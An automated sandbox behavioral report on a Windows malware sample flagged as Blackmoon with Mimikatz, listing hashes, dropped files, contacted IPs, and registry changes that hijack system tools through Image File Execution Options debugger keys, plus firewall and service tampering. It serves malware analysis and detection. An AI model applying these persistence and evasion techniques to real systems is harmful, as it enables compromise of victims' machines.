Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-12-2024 18:38
Behavioral task
behavioral1
Sample
3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe
Resource
win10v2004-20241007-en
General
-
Target
3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe
-
Size
9.3MB
-
MD5
1c73244737b508707c2628b8c9a56786
-
SHA1
d8e5970bb842fdbd74ab921f218aa9818f4f4063
-
SHA256
3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f
-
SHA512
129e685cada5bb09774adc9e17c046b3fb9f6fcec10f6e2b5f3572d1105396d512879bb755e317cd49d12f27cdb7a94aa1f27c31e79384be9f359e8c4808d7d6
-
SSDEEP
196608:K2c1uwl1CPwDv3uFhi43v13uFnCPws8S/VW08Sr8lQeY3YgOFmknGzwHIPHd9DP0:KnEwl1CPwDv3uFY43v13uFnCPwa/VW0c
Malware Config
Signatures
-
Blackmoon family
-
Detect Blackmoon payload 5 IoCs
resource yara_rule behavioral1/memory/2356-0-0x0000000000400000-0x0000000000D0F000-memory.dmp family_blackmoon behavioral1/memory/2356-12-0x0000000000400000-0x0000000000D0F000-memory.dmp family_blackmoon behavioral1/files/0x00060000000186f8-24.dat family_blackmoon behavioral1/memory/2768-28-0x0000000000400000-0x0000000000D0F000-memory.dmp family_blackmoon behavioral1/memory/2608-67-0x0000000000400000-0x0000000000469000-memory.dmp family_blackmoon -
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
resource yara_rule behavioral1/memory/2356-0-0x0000000000400000-0x0000000000D0F000-memory.dmp mimikatz behavioral1/memory/2356-12-0x0000000000400000-0x0000000000D0F000-memory.dmp mimikatz behavioral1/files/0x00060000000186f8-24.dat mimikatz behavioral1/memory/2768-28-0x0000000000400000-0x0000000000D0F000-memory.dmp mimikatz -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts bcvnbib.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 44 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\schtasks.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\schtasks.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cacls.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1560 netsh.exe 2072 netsh.exe -
Executes dropped EXE 13 IoCs
pid Process 1052 hentai.exe 2952 kkmiuy.exe 2768 bcvnbib.exe 2720 hentai.exe 2812 bcvnbib.exe 2568 hentai.exe 2608 jxhsmecnfsqhiqy9821.exe 1204 bcvnbib.exe 576 hentai.exe 1428 bcvnbib.exe 1396 hentai.exe 2436 bcvnbib.exe 2580 hentai.exe -
Loads dropped DLL 16 IoCs
pid Process 2356 3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe 2356 3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe 2912 cmd.exe 2912 cmd.exe 2768 bcvnbib.exe 2768 bcvnbib.exe 2812 bcvnbib.exe 2812 bcvnbib.exe 2812 bcvnbib.exe 2812 bcvnbib.exe 1204 bcvnbib.exe 1204 bcvnbib.exe 1428 bcvnbib.exe 1428 bcvnbib.exe 2436 bcvnbib.exe 2436 bcvnbib.exe -
Unexpected DNS network traffic destination 64 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 142.4.205.47 Destination IP 185.84.81.194 Destination IP 161.97.219.84 Destination IP 163.172.168.171 Destination IP 94.103.153.176 Destination IP 207.148.83.241 Destination IP 165.227.40.43 Destination IP 142.4.205.47 Destination IP 161.97.219.84 Destination IP 5.132.191.104 Destination IP 51.254.25.115 Destination IP 51.254.25.115 Destination IP 104.128.239.75 Destination IP 178.63.116.152 Destination IP 207.148.83.241 Destination IP 66.70.228.164 Destination IP 142.4.204.111 Destination IP 208.87.98.37 Destination IP 161.97.219.84 Destination IP 51.77.227.84 Destination IP 165.227.40.43 Destination IP 159.203.38.175 Destination IP 66.70.228.164 Destination IP 178.63.116.152 Destination IP 198.100.148.224 Destination IP 188.226.146.136 Destination IP 159.203.38.175 Destination IP 89.40.116.230 Destination IP 207.192.71.13 Destination IP 51.77.227.84 Destination IP 79.124.7.81 Destination IP 144.76.103.143 Destination IP 144.76.103.143 Destination IP 13.239.157.177 Destination IP 142.4.204.111 Destination IP 159.203.38.175 Destination IP 13.239.157.177 Destination IP 165.227.40.43 Destination IP 185.84.81.194 Destination IP 208.87.98.37 Destination IP 79.124.7.81 Destination IP 51.75.173.177 Destination IP 144.76.103.143 Destination IP 13.239.157.177 Destination IP 142.4.204.111 Destination IP 104.128.239.75 Destination IP 163.172.168.171 Destination IP 94.103.153.176 Destination IP 178.63.116.152 Destination IP 188.226.146.136 Destination IP 207.148.83.241 Destination IP 198.100.148.224 Destination IP 207.192.71.13 Destination IP 51.75.173.177 Destination IP 185.84.81.194 Destination IP 51.77.227.84 Destination IP 51.75.173.177 Destination IP 5.132.191.104 Destination IP 66.70.228.164 Destination IP 163.172.168.171 Destination IP 207.192.71.13 Destination IP 79.124.7.81 Destination IP 142.4.205.47 Destination IP 94.103.153.176 -
description ioc Process Delete value \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger bcvnbib.exe -
Creates a Windows Service
-
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\kkmiuy.exe hentai.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat bcvnbib.exe File created C:\Windows\SysWOW64\kkmiuy.exe hentai.exe -
resource yara_rule behavioral1/files/0x0007000000019438-54.dat upx behavioral1/memory/2608-64-0x0000000000400000-0x0000000000469000-memory.dmp upx behavioral1/memory/2812-61-0x0000000010000000-0x000000001000B000-memory.dmp upx behavioral1/memory/2608-67-0x0000000000400000-0x0000000000469000-memory.dmp upx -
Drops file in Windows directory 5 IoCs
description ioc Process File created C:\Windows\gbmitiih\bcvnbib.exe 3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe File opened for modification C:\Windows\gbmitiih\bcvnbib.exe 3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe File created C:\Windows\gbmitiih\jxhsmecnfsqhiqy9821.exe bcvnbib.exe File created C:\Windows\Fonts\bcvnbib.exe bcvnbib.exe File opened for modification C:\Windows\Fonts\bcvnbib.exe bcvnbib.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2792 sc.exe 2920 sc.exe 2532 sc.exe 2660 sc.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bcvnbib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hentai.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hentai.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bcvnbib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bcvnbib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kkmiuy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bcvnbib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2912 cmd.exe 2928 PING.EXE -
NSIS installer 1 IoCs
resource yara_rule behavioral1/files/0x00060000000186f8-24.dat nsis_installer_2 -
Modifies data under HKEY_USERS 57 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 bcvnbib.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ bcvnbib.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings bcvnbib.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 bcvnbib.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00eb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 bcvnbib.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" bcvnbib.exe Set value (int) 